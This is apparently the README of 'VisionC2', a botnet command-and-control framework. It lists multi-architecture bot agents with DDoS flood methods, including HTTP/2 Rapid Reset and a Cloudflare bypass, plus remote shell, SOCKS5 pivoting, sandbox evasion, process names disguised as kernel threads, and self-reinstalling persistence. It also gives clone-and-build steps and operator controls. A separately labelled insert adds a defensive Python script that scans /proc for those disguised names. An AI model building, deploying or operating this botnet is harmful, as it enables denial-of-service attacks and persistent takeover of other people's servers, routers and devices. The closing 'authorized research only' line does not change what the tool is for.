14-arch cross-compiled agents with DDoS, RCE, and SOCKS5 modules. Communications protected by TLS 1.3 transport + 6-layer C2 address obfuscation + AES-128-CTR string encryption, anti-analysis/sandbox killer and full persistence — driven through a real-time Go TUI
| | Feature | Details |
|---|---|---|
| 🔧 | Auto-Setup | Python script automates config + build |
| 🌐 | Cross-Platform | 14 multi-arch targets, custom UPX packer (strips headers) |
| 🔒 | Comms | TLS 1.3 on port 443, indistinguishable from standard HTTPS |
| 🧦 | SOCKS5 Proxy | Full pivoting, RFC 1929 auth, runtime credential updates |
| 💻 | Remote Shell | Command execution + output capture, Linux shortcuts & post-exploit helpers |
| 🛡️ | Evasion | 6-layer C2 encryption (AES-128-CTR + obfuscation), encrypted strings, split XOR key, 40+ VM/sandbox/debugger signatures, 24–27h delayed exit |
| 👻 | Stealth | Unix daemonization, single-instance, disguised process names, PID lock |
| 🔁 | Persistence | Systemd + cron + rc.local, hidden dir w/ download script, auto-reinfection, cleanup tool included |
Layer 4 — Network/Transport
| Method | Description |
|---|---|
| UDP Flood | High-volume 1024-byte payload spam |
| TCP Flood | Connection table exhaustion |
| SYN Flood | SYN packets with randomized source ports (raw TCP) |
| ACK Flood | ACK packet flooding (raw TCP) |
| GRE Flood | GRE protocol (47) packets with max payload |
| DNS Flood | Randomized DNS query types (DNS Reflection Attack, Max PPS+) |
Layer 7 — Application
| Method | Description |
|---|---|
| HTTP Flood | GET/POST with randomized headers + user-agents |
| HTTPS/TLS Flood | TLS handshake exhaustion + burst requests |
| CF Bypass | Cloudflare bypass via session/cookie reuse + fingerprinting |
| Rapid Reset | HTTP/2 exploit (CVE-2023-44487) with batched HEADERS + RST_STREAM |
| Proxy Support | Full proxy integration for all L7 methods (HTTP + SOCKS5) |
```bash
sudo apt update && sudo apt install -y upx-ucl openssl git wget gcc python3 screen netcat
# Go 1.23+
wget https://go.dev/dl/go1.23.0.linux-amd64.tar.gz
sudo rm -rf /usr/local/go && sudo tar -C /usr/local -xzf go1.23.0.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc && source ~/.bashrc
```

| Requirement | Minimum | Recommended |
|---|---|---|
| RAM / Storage | 512MB / 1GB | 2GB+ / 5GB+ |
| OS | Linux (any) | Ubuntu 22.04+ / Debian 12+ |
| Network | Port 443 open | + Admin port for split mode |
```bash
git clone https://github.com/Syn2Much/VisionC2.git && cd VisionC2
python3 setup.py   # Select [1] Full Setup
```

The wizard prompts for C2 address, admin port (default: 420), and TLS cert details. Output:

- bins/ → 14 bot binaries (multi-arch)
- cnc/certificates/ → server.crt + server.key
- server → CNC binary
- setup_config.txt → Config summary

To change the C2 address later: run python3 setup.py and choose option [2]. Redeploy bots afterward.
```bash
./server           # TUI mode (default, recommended)
./server --split   # Telnet mode on admin port (default: 420)
```

Split mode connect: nc YOUR_IP 420 → type spamtec → login.
Background: screen -S vision ./server (detach: Ctrl+A, D)
First run creates the root user with a random password — save it.
| Key | Action |
|---|---|
| ↑/↓ or k/j | Navigate |
| Enter | Select |
| q / Esc | Back / Cancel |
| r | Refresh |
- 🤖 Bot List — Live bot status. Enter=shell, b=broadcast shell, l=attack, i=info, p=persist, r=reinstall, k=kill
- 💻 Remote Shell — Interactive shell to one bot. Ctrl+F=clear, Ctrl+P=persist, Ctrl+R=reinstall
- 📡 Broadcast Shell — Command all bots. Ctrl+A=filter arch, Ctrl+G=filter RAM, Ctrl+B=limit bots
- ⚡ Launch Attack — Select method, target, port, duration → l to launch
- 📊 Ongoing Attacks — Progress bars + time remaining. s=stop all
- 🧦 Socks Manager — s=start socks, x=stop. Default: socks5://user:pass@BOT_IP:1080. Update creds: !socksauth <user> <pass>
- 📜 Connection Logs — Bot connect/disconnect history
| Binary | Architecture | Use Case |
|---|---|---|
| ethd0 | x86_64 (amd64) | Servers, desktops |
| kworkerd0 | x86 (386) | 32-bit systems |
| ip6addrd | ARM64 | Raspberry Pi 4, phones |
| mdsync1 | ARMv7 | Raspberry Pi 2/3 |
| deferwqd | MIPS | Routers |
| devfreqd0 | MIPSLE | Routers (little-endian) |
| ...and 8 more | Various | IoT, embedded |
See Build.sh for the full binary map reference.

- cnc/ — Command & Control server. Dual-listener architecture: TLS on port 443 for bot connections, interactive TUI built with Bubble Tea. RBAC with four permission levels (Basic/Pro/Admin/Owner) defined in users.json.
- bot/ — Agent deployed to targets. Connects back to CNC over TLS 1.3. Lifecycle: decrypt config → daemonize → singleton lock → sandbox detection → install persistence → DNS-resolve C2 → connect with reconnect loop.
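The binary table above gives the agent names that are chosen to look like kernel threads. The following defender-side audit is an added example and not part of the VisionC2 project: it walks /proc and flags any user-space process carrying one of those names. Real kernel threads are children of kthreadd (PID 2) and have an empty /proc/<pid>/cmdline, so a process with a kernel-thread lookalike name that fails either check is worth a closer look. The name list is taken from the README's binary table and is assumed to be current; the helper names are mine.

```python
"""Audit /proc for user-space processes named like kernel threads.

Added defender-side example; not project code. Suspect names come from the
binary table in this README. A genuine kernel thread has PPid 2 (kthreadd)
and an empty cmdline, so anything with a suspect name that breaks that
pattern is reported.
"""
import os

# Agent binary names from the README table (assumed current).
SUSPECT_NAMES = {"ethd0", "kworkerd0", "ip6addrd", "mdsync1", "deferwqd", "devfreqd0"}
KTHREADD_PID = 2


def is_suspicious(comm: str, ppid: int, cmdline: bytes) -> bool:
    """True when `comm` is a suspect name and the process is not a real kernel thread."""
    if comm not in SUSPECT_NAMES:
        return False
    looks_like_kthread = ppid == KTHREADD_PID and cmdline == b""
    return not looks_like_kthread


def read_status(pid: int) -> tuple:
    """Return (Name, PPid) parsed from /proc/<pid>/status."""
    comm, ppid = "", -1
    with open(f"/proc/{pid}/status") as fh:
        for line in fh:
            key, _, val = line.partition(":")
            if key == "Name":
                comm = val.strip()
            elif key == "PPid":
                ppid = int(val.strip())
    return comm, ppid


def scan_proc() -> list:
    """Return [(pid, comm), ...] for every suspicious process on this host."""
    hits = []
    if not os.path.isdir("/proc"):
        return hits  # not a Linux procfs host; nothing to scan
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            comm, ppid = read_status(pid)
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmdline = fh.read()
        except (FileNotFoundError, ProcessLookupError, PermissionError):
            continue  # process exited or is not readable; skip it
        if is_suspicious(comm, ppid, cmdline):
            hits.append((pid, comm))
    return hits


if __name__ == "__main__":
    for pid, comm in scan_proc():
        print(f"PID {pid}: user-space process named {comm!r} (kernel-thread lookalike)")
```

Run it as root so every /proc/<pid>/cmdline is readable; an empty result means no lookalike names were found, not that the host is clean.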
| File | Purpose |
|---|---|
| bot/config.go | All configuration: AES-encrypted C2 address (encGothTits), crypto seed, magic code, protocol version, encrypted string blobs |
| bot/connection.go | TLS connection, multi-method DNS resolution chain (DoH → UDP → A record → raw) |
| bot/attacks.go | All L4/L7 DDoS methods |
| bot/opsec.go | AES encryption, key derivation, sandbox/VM/debugger detection |
| bot/persist.go | Persistence via systemd, cron, rc.local |
| bot/socks.go | SOCKS5 proxy with RFC 1929 auth |
| cnc/ui.go | Bubble Tea TUI — all views, keybindings, rendering |
| cnc/cmd.go | Command dispatch and routing to bots |
| cnc/connection.go | Bot connection handling, TLS setup, heartbeat |
| cnc/miscellaneous.go | RBAC, user authentication, utilities |
- C2 address: 6-layer encoding pipeline — AES-128-CTR outer layer wrapping 5 inner layers (MD5 checksum → byte substitution → RC4 → XOR rotating key → base64). The AES-encrypted blob is decrypted at runtime, then decoded in a 5-step process.
- Sensitive strings: AES-128-CTR with a key derived from 16 split XOR functions. Encrypted at build time via tools/crypto.go, decrypted at runtime by initSensitiveStrings().
- Transport: TLS 1.3 with self-signed certificates (generated by setup.py in cnc/certificates/).
| Document | Description |
|---|---|
| ARCHITECTURE.md | Full system architecture |
| CHANGELOG.md | Version history and changes |
| COMMANDS.md | Command reference |
| SETUP.md | Setup guide |
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATIONAL PURPOSES ONLY
Usage of this tool for attacking targets without prior mutual consent is illegal. The developer assumes no liability and is not responsible for any misuse or damage caused by this program.
Syn2Much — dev@sinnners.city · @synacket
